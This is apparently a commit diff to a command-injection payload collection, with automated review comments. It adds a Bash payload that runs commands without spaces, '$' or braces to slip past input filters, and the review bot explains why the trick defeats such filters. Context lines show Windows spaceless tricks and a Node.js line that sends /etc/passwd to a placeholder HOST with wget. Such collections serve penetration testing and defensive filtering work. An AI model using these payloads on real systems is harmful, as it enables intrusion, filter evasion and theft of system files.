RCE no {}, no space

patch-1
Swissky 2017-08-13 16:35:12 +02:00
parent 9adb81e6d8
commit 901d279fb3
1 changed files with 7 additions and 0 deletions

@ -50,6 +50,12 @@ ping%CommonProgramFiles:~10,-18%IP
ping%PROGRAMFILES:~10,-5%IP
```
Code execution without spaces, $ or { } - Linux (Bash only)
```
IFS=,;`cat<<<uname,-a`
```
## Time based data exfiltration
Extracting data : char by char
```
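Review bot: The new entry labelled "Code execution without spaces, $ or { } - Linux (Bash only)" gives the payload with no explanation of why it works or what it depends on. Suggest one sentence after the code block saying that `IFS=,` makes the comma the field separator, so the output of `cat<<<uname,-a` is split into `uname` and `-a` when the backticks run it. The `<<<` here-string is not POSIX sh syntax, which is presumably what "Bash only" refers to; saying so would make the constraint explicit. It is also worth stating that the line contains no space, `$`, `{` or `}`, so an input filter that rejects only those characters does not stop it. The label itself is plain text, while the next section uses a `##` heading; a sub-heading or the same label style as the neighbouring entries would keep the file consistent.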
@ -82,3 +88,4 @@ require('child_process').exec('wget --post-data+"x=$(cat /etc/passwd)"+HOST')
## Thanks to
* [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/)
* [Bug Bounty Survey - Windows RCE spaceless](https://twitter.com/bugbsurveys/status/860102244171227136)
* [No PHP, no spaces, no $, no { }, bash only - @asdizzle](https://twitter.com/asdizzle_/status/895244943526170628)
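Review bot: The credit added at the end of "Thanks to" is written title first and author last ("... bash only - @asdizzle"), while the two existing entries are written source first, then title. Suggest "@asdizzle - No PHP, no spaces, no $, no { }, bash only" so the list reads consistently. The link text also says "No PHP", which the section label added in the first hunk does not mention; align the wording between the two.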